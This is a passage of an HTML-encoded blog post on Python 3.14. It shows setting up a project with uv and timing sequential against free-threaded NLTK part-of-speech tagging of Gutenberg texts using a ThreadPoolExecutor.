&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;gt;&amp;gt;&amp;gt; import sys
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;gt;&amp;gt;&amp;gt; sys._is_gil_enabled&lt;span style="color:#ff7b72;font-weight:bold"&gt;()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# False&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="project-creation-and-management-with-uv"&gt;Project creation and management with &lt;code&gt;uv&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;uv&lt;/code&gt; is capable of much more than allowing us to switch between
different versions of Python. The following commands initialise a Python
project with &lt;code&gt;uv&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# From ~/temp/blog-py3.14&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Indicate the default python version for the project&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv python pin 3.14
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Initialise a project in the current directory&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv init .
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Check the Python version&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv run python --version
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Python 3.14.0rc2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This adds some files for project metadata (pyproject.toml, README.md)
and version control:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tree -a -L &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# .&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├── .git&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├── .gitignore&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├── main.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├── pyproject.toml&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├── .python-version&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├── README.md&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├── uv.lock&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# └── .venv&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 2 directories, 6 files&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we can add package dependencies using &lt;code&gt;uv add &amp;lt;packageName&amp;gt;&lt;/code&gt; and
other standard project-management tasks. But one thing I wanted to
highlight is that &lt;code&gt;uv&lt;/code&gt; allows us to start a Jupyter notebook, using the
project’s Python interpreter, without either adding &lt;code&gt;jupyter&lt;/code&gt; as a
dependency or explicitly defining a kernel for &lt;code&gt;jupyter&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv run --with jupyter jupyter lab
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Creating a new notebook using the default Python 3 kernel in the
&lt;a href="https://jupyterlab.readthedocs.io/en/stable/" rel="external"&gt;JupyterLab&lt;/a&gt; session that
starts, should ensure you are using the currently active Python 3.14
environment.&lt;/p&gt;
&lt;h2 id="threading"&gt;Threading&lt;/h2&gt;
&lt;p&gt;Python 3.13 introduced an experimental feature, ‘Free-threading’, that
is now officially supported as of 3.14.&lt;/p&gt;
&lt;p&gt;First though, what is a &amp;rsquo;thread&amp;rsquo;? When a program runs on your computer,
there are lots of different tasks going on. Some of those tasks could
run independently of each other. You, as the programmer, may need to
explain to the computer which tasks can run independently. A thread is a
way of cordoning-off one of those tasks; it&amp;rsquo;s a way of telling the
computer that your software is running on, that &lt;em&gt;this task here&lt;/em&gt; can run
separately from &lt;em&gt;those tasks there&lt;/em&gt;, and the logic for running
&lt;em&gt;this task&lt;/em&gt; too. (Basically).&lt;/p&gt;
&lt;p&gt;Python has allowed developers to define threads for a while. If you have
a few tasks that are largely independent of each other, each of these
tasks can run in a separate thread. Threads can access the same memory
space, meaning that they can access and modify shared variables in a Python
session. In general, this also means that a computation in one thread
could update a value that is used by another thread, or that two
different threads could make conflicting updates to the same variable.
This freedom can lead to bugs. The CPython interpreter was originally
written with a locking mechanism (the Global Interpreter Lock, GIL) that
prevented different threads from running at the same time (even when
multiple processors were available) and limited the reach of these bugs.&lt;/p&gt;
&lt;p&gt;Traditionally, you would have used threads for “non-CPU-bound tasks” in
Python. These are the kinds of tasks that would be unaffected by having
more, or faster, processors available to the Python instance: network
traffic, file access, waiting for user input. For CPU-bound tasks, like
calculations and data-processing, you could use Python’s
‘multiprocessing’ library (although some libraries like ‘numpy’ have
their own low-level mechanisms for splitting work across cores). This
starts multiple Python instances, each doing a portion of the
processing, and allows a workload to be partitioned across multiple
processors.&lt;/p&gt;
&lt;p&gt;The main other differences between threading and multiprocessing in
Python are in memory and data management. With threading, you have one
Python instance, with each thread having access to the same memory
space. With multiprocessing, you have multiple Python instances that
work independently: the instances do not share memory, so to partition a
workload using multiprocessing, Python has to send copies of (subsets
of) your data to the new instances. This could mean that you need to
store two or more copies of a large dataset in memory when using
multiprocessing upon it.&lt;/p&gt;
&lt;p&gt;Simultaneous processing across threads that share memory-space is now
possible using the free-threaded build of Python. Many third-party
packages have been rewritten to accommodate this new build and you can
learn more about free-threading and the progress of the changes in the
&lt;a href="https://py-free-threading.github.io/" rel="external"&gt;“Python Free-Threading Guide”&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;As a simple-ish example, lets consider natural language processing.
There is a wonderful blog post about parallel processing with the
&lt;a href="https://www.nltk.org/" rel="external"&gt;&lt;code&gt;nltk&lt;/code&gt;&lt;/a&gt; package on the
&lt;a href="https://datascience.blog.wzb.eu/2017/06/19/speeding-up-nltk-with-parallel-processing/" rel="external"&gt;“WZB Data Science Blog”&lt;/a&gt;.
We will extend that example to use free-threading.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;ntlk&lt;/code&gt; provides access to some of the
&lt;a href="https://www.gutenberg.org/" rel="external"&gt;Project Gutenberg&lt;/a&gt; books, and we can
access this data as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# main.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;nltk&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;setup&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; nltk&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;download(&lt;span style="color:#a5d6ff"&gt;&amp;#34;gutenberg&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; nltk&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;download(&lt;span style="color:#a5d6ff"&gt;&amp;#34;punkt_tab&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; nltk&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;download(&lt;span style="color:#a5d6ff"&gt;&amp;#39;averaged_perceptron_tagger_eng&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; corpus &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; { f_id: nltk&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;corpus&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;gutenberg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;raw(f_id)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; f_id &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; nltk&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;corpus&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;gutenberg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;fileids()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; corpus
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;corpus &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; setup()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The key-value pairs in &lt;code&gt;corpus&lt;/code&gt; are the abbreviated book-title and
contents for 18 books. For example:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;corpus[&lt;span style="color:#a5d6ff"&gt;&amp;#34;austen-emma.txt&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [Emma by Jane Austen 1816]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# VOLUME I&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# CHAPTER I&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Emma Woodhouse, handsome, clever, and rich, with a comfortable home ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;A standard part of a text-processing workflow is to tokenise and tag the
“parts-of-speech” (POS) in a document. We can do this using two &lt;code&gt;nltk&lt;/code&gt;
functions:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# main.py ... continued&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tokenise_and_pos_tag&lt;/span&gt;(doc):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; nltk&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;pos_tag(nltk&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;word_tokenize(doc))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;A function to sequentially tokenise and POS-tag the contents of a corpus
of books can be written:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# main.py ... continued&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tokenise_seq&lt;/span&gt;(corpus):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tokens &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; f_id: tokenise_and_pos_tag(doc)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; f_id, doc &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; corpus&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;items()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; tokens
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You need to install or build Python in a particular way to make use of
“Free-threaded” Python. In the above, we installed Python &amp;ldquo;3.14t&amp;rdquo; using
&lt;code&gt;uv&lt;/code&gt;, so we can compare the speed of free-threaded and sequential,
single-core, processing.&lt;/p&gt;
&lt;p&gt;We will use the
&lt;a href="https://docs.python.org/3/library/timeit.html" rel="external"&gt;&lt;code&gt;timeit&lt;/code&gt;&lt;/a&gt; package to
analyse processing speed, from the command line.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Activate the threaded version of Python 3.14&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv python pin 3.14t
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Install the dependencies for our main.py script&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv add timeit nltk
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Time the `tokenise_seq()` function&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# -- but do not time any setup code...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;PYTHON_GIL&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; uv run python -m timeit &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; --setup &lt;span style="color:#a5d6ff"&gt;&amp;#34;import main; corpus = main.setup()&amp;#34;&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;main.tokenise_seq(corpus)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [lots of output messages]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 1 loop, best of 5: 53.1 sec per loop&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;After some initial steps where the &lt;code&gt;nltk&lt;/code&gt; datasets were downloaded and the
&lt;code&gt;corpus&lt;/code&gt; object was created (neither of which were timed, because these
steps were part of the &lt;code&gt;timeit&lt;/code&gt; &lt;code&gt;--setup&lt;/code&gt; block), &lt;code&gt;tokenise_seq(corpus)&lt;/code&gt; was
run multiple times and the fastest speed was around 53 seconds.&lt;/p&gt;
&lt;p&gt;A small note: we have used the environment variable &lt;code&gt;PYTHON_GIL=0&lt;/code&gt; here.
This makes it explicit that we are using free-threading (turning off the
GIL). This wouldn’t normally be necessary to take advantage of
free-threading (in Python &amp;ldquo;3.14t&amp;rdquo;), but was needed because one of the
dependencies of &lt;code&gt;nltk&lt;/code&gt; hasn’t
been validated for the free-threaded build yet.&lt;/p&gt;
&lt;p&gt;To write a threaded-version of the same, we introduce two functions. The
first is a helper that takes (filename, document-content) pairs and
returns (filename, processed-document) pairs:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tupled_tokeniser&lt;/span&gt;(pair):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; file_id, doc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pair
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; file_id, tokenise_and_pos_tag(doc)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The second function creates a Thread-pool, taking advantage of as many CPUs as there are available
on my machine (16, counted by &lt;code&gt;multiprocessing.cpu_count()&lt;/code&gt;). Each document is processed as a
separate thread and we wait for all of the documents to be processed before returning results to the
caller:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;multiprocessing&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;mp&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;concurrent.futures&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; ThreadPoolExecutor, wait
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tokenise_threaded&lt;/span&gt;(corpus):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;with&lt;/span&gt; ThreadPoolExecutor(max_workers&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;mp&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;cpu_count()) &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; tpe:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;try&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; futures &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tpe&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;submit(tupled_tokeniser, pair)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; pair &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; corpus&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;items()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; wait(futures)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;finally&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# output is a list of (file-id, data) pairs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tokens &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [f&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;result() &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; f &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; futures]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; tokens
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Time the `tokenise_threaded()` function&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# -- but do not time any setup code...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;PYTHON_GIL&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; uv run python -m timeit &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; --setup &lt;span style="color:#a5d6ff"&gt;&amp;#34;import main; corpus = main.setup()&amp;#34;&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;main.tokenise_threaded(corpus)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [lots of output messages]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 1 loop, best of 5: 32.5 sec per loop&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I could see that every core was used when processing the documents, using the
&lt;a href="https://htop.dev/" rel="external"&gt;&lt;code&gt;htop&lt;/code&gt; tool&lt;/a&gt; on Ubuntu. At points during the run, each of the 16 CPUs was at
near to 100% use (whereas only one or two CPUs were busy at any time during the sequential run):&lt;/p&gt;
&lt;p&gt;&lt;img
